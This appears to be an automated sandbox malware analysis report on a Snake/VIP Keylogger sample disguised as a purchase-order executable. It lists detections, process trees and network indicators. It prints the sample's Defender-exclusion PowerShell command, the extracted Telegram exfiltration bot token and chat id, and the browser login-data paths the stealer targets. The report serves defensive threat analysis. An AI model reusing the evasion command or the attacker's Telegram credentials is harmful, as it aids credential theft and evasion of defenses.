Edit tour

Windows Analysis Report
SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Overview

General Information

Sample name:	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe renamed because original name is a hash value
Original sample name:	SC110-11Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Analysis ID:	1636899
MD5:	d18ab5998c51922215bf0210b3d47491
SHA1:	0e8e9cad6aa5715dcc0daa67782cde0ca8a971ac
SHA256:	e91f580c44b75485d8742039aa469e5c979e44db9d8fee5f2017e4f5c7cc0796
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe" MD5: D18AB5998C51922215BF0210B3D47491)

powershell.exe (PID: 7452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe" MD5: D18AB5998C51922215BF0210B3D47491)

WerFault.exe (PID: 7564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7468 -s 2428 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 7756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4", "Chat id": "-4724020147"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4", "Chat_id": "-4724020147", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2db6f:$a1: get_encryptedPassword 0x2de90:$a2: get_encryptedUsername 0x2d97f:$a3: get_timePasswordChanged 0x2da88:$a4: get_passwordField 0x2db85:$a5: set_encryptedPassword 0x2f229:$a7: get_logins 0x2f18c:$a10: KeyLoggerEventArgs 0x2edf1:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e79f:$a1: get_encryptedPassword 0x71dbf:$a1: get_encryptedPassword 0xb51df:$a1: get_encryptedPassword 0x2eac0:$a2: get_encryptedUsername 0x720e0:$a2: get_encryptedUsername 0xb5500:$a2: get_encryptedUsername 0x2e5af:$a3: get_timePasswordChanged 0x71bcf:$a3: get_timePasswordChanged 0xb4fef:$a3: get_timePasswordChanged 0x2e6b8:$a4: get_passwordField 0x71cd8:$a4: get_passwordField 0xb50f8:$a4: get_passwordField 0x2e7b5:$a5: set_encryptedPassword 0x71dd5:$a5: set_encryptedPassword 0xb51f5:$a5: set_encryptedPassword 0x2fe59:$a7: get_logins 0x73479:$a7: get_logins 0xb6899:$a7: get_logins 0x2fdbc:$a10: KeyLoggerEventArgs 0x733dc:$a10: KeyLoggerEventArgs 0xb67fc:$a10: KeyLoggerEventArgs
Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x50214:$a1: get_encryptedPassword 0x5052b:$a2: get_encryptedUsername 0x5002e:$a3: get_timePasswordChanged 0x50137:$a4: get_passwordField 0x5022a:$a5: set_encryptedPassword 0x526ff:$a7: get_logins 0x52662:$a10: KeyLoggerEventArgs 0x522cb:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x338e6:$a1: get_encryptedPassword 0x33bfd:$a2: get_encryptedUsername 0x33700:$a3: get_timePasswordChanged 0x33809:$a4: get_passwordField 0x338fc:$a5: set_encryptedPassword 0x35dd1:$a7: get_logins 0x35d34:$a10: KeyLoggerEventArgs 0x3599d:$a11: KeyLoggerEventArgsEventHandler
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dd6f:$a1: get_encryptedPassword 0x2e090:$a2: get_encryptedUsername 0x2db7f:$a3: get_timePasswordChanged 0x2dc88:$a4: get_passwordField 0x2dd85:$a5: set_encryptedPassword 0x2f429:$a7: get_logins 0x2f38c:$a10: KeyLoggerEventArgs 0x2eff1:$a11: KeyLoggerEventArgsEventHandler
4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bb75:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b218:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b475:$a4: \Orbitum\User Data\Default\Login Data 0x3be54:$a5: \Kometa\User Data\Default\Login Data
4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e97f:$s1: UnHook 0x2e986:$s2: SetHook 0x2e98e:$s3: CallNextHook 0x2e99b:$s4: _hook
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bf6f:$a1: get_encryptedPassword 0x2c290:$a2: get_encryptedUsername 0x2bd7f:$a3: get_timePasswordChanged 0x2be88:$a4: get_passwordField 0x2bf85:$a5: set_encryptedPassword 0x2d629:$a7: get_logins 0x2d58c:$a10: KeyLoggerEventArgs 0x2d1f1:$a11: KeyLoggerEventArgsEventHandler
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bf6f:$a1: get_encryptedPassword 0x2c290:$a2: get_encryptedUsername 0x2bd7f:$a3: get_timePasswordChanged 0x2be88:$a4: get_passwordField 0x2bf85:$a5: set_encryptedPassword 0x2d629:$a7: get_logins 0x2d58c:$a10: KeyLoggerEventArgs 0x2d1f1:$a11: KeyLoggerEventArgsEventHandler
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39d75:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39418:$a3: \Google\Chrome\User Data\Default\Login Data 0x39675:$a4: \Orbitum\User Data\Default\Login Data 0x3a054:$a5: \Kometa\User Data\Default\Login Data
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39d75:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39418:$a3: \Google\Chrome\User Data\Default\Login Data 0x39675:$a4: \Orbitum\User Data\Default\Login Data 0x3a054:$a5: \Kometa\User Data\Default\Login Data
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cb7f:$s1: UnHook 0x2cb86:$s2: SetHook 0x2cb8e:$s3: CallNextHook 0x2cb9b:$s4: _hook
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cb7f:$s1: UnHook 0x2cb86:$s2: SetHook 0x2cb8e:$s3: CallNextHook 0x2cb9b:$s4: _hook
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dd6f:$a1: get_encryptedPassword 0x7118f:$a1: get_encryptedPassword 0x2e090:$a2: get_encryptedUsername 0x714b0:$a2: get_encryptedUsername 0x2db7f:$a3: get_timePasswordChanged 0x70f9f:$a3: get_timePasswordChanged 0x2dc88:$a4: get_passwordField 0x710a8:$a4: get_passwordField 0x2dd85:$a5: set_encryptedPassword 0x711a5:$a5: set_encryptedPassword 0x2f429:$a7: get_logins 0x72849:$a7: get_logins 0x2f38c:$a10: KeyLoggerEventArgs 0x727ac:$a10: KeyLoggerEventArgs 0x2eff1:$a11: KeyLoggerEventArgsEventHandler 0x72411:$a11: KeyLoggerEventArgsEventHandler
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bb75:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7ef95:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b218:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e638:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b475:$a4: \Orbitum\User Data\Default\Login Data 0x7e895:$a4: \Orbitum\User Data\Default\Login Data 0x3be54:$a5: \Kometa\User Data\Default\Login Data 0x7f274:$a5: \Kometa\User Data\Default\Login Data
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e97f:$s1: UnHook 0x71d9f:$s1: UnHook 0x2e986:$s2: SetHook 0x71da6:$s2: SetHook 0x2e98e:$s3: CallNextHook 0x71dae:$s3: CallNextHook 0x2e99b:$s4: _hook 0x71dbb:$s4: _hook
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dd6f:$a1: get_encryptedPassword 0x7138f:$a1: get_encryptedPassword 0xb47af:$a1: get_encryptedPassword 0x2e090:$a2: get_encryptedUsername 0x716b0:$a2: get_encryptedUsername 0xb4ad0:$a2: get_encryptedUsername 0x2db7f:$a3: get_timePasswordChanged 0x7119f:$a3: get_timePasswordChanged 0xb45bf:$a3: get_timePasswordChanged 0x2dc88:$a4: get_passwordField 0x712a8:$a4: get_passwordField 0xb46c8:$a4: get_passwordField 0x2dd85:$a5: set_encryptedPassword 0x713a5:$a5: set_encryptedPassword 0xb47c5:$a5: set_encryptedPassword 0x2f429:$a7: get_logins 0x72a49:$a7: get_logins 0xb5e69:$a7: get_logins 0x2f38c:$a10: KeyLoggerEventArgs 0x729ac:$a10: KeyLoggerEventArgs 0xb5dcc:$a10: KeyLoggerEventArgs
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bb75:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f195:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc25b5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b218:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e838:$a3: \Google\Chrome\User Data\Default\Login Data 0xc1c58:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b475:$a4: \Orbitum\User Data\Default\Login Data 0x7ea95:$a4: \Orbitum\User Data\Default\Login Data 0xc1eb5:$a4: \Orbitum\User Data\Default\Login Data 0x3be54:$a5: \Kometa\User Data\Default\Login Data 0x7f474:$a5: \Kometa\User Data\Default\Login Data 0xc2894:$a5: \Kometa\User Data\Default\Login Data
0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e97f:$s1: UnHook 0x71f9f:$s1: UnHook 0xb53bf:$s1: UnHook 0x2e986:$s2: SetHook 0x71fa6:$s2: SetHook 0xb53c6:$s2: SetHook 0x2e98e:$s3: CallNextHook 0x71fae:$s3: CallNextHook 0xb53ce:$s3: CallNextHook 0x2e99b:$s4: _hook 0x71fbb:$s4: _hook 0xb53db:$s4: _hook
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ParentImage: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ParentProcessId: 7348, ParentProcessName: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ProcessId: 7452, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ParentImage: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ParentProcessId: 7348, ParentProcessName: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ProcessId: 7452, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7756, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:49:23.323844+0100	2803305	3	Unknown Traffic	192.168.2.11	49701	104.21.64.1	443	TCP
2025-03-13T08:49:28.595176+0100	2803305	3	Unknown Traffic	192.168.2.11	49707	104.21.64.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:49:18.471175+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49699	193.122.130.0	80	TCP
2025-03-13T08:49:21.156741+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49699	193.122.130.0	80	TCP
2025-03-13T08:49:23.878815+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49702	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:49:44.776619+0100	1810007	1	Potentially Bad Traffic	192.168.2.11	54971	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Avira: detected

Found malware configuration

Source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4", "Chat id": "-4724020147"}
Source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4", "Chat_id": "-4724020147", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Virustotal: Detection: 28%			Perma Link
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	ReversingLabs: Detection: 34%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack	String decryptor:
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack	String decryptor: 7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack	String decryptor: -4724020147

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49700 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:54971 version: TLS 1.2

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb< source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531945426.0000000006249000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbL~ source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Security.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
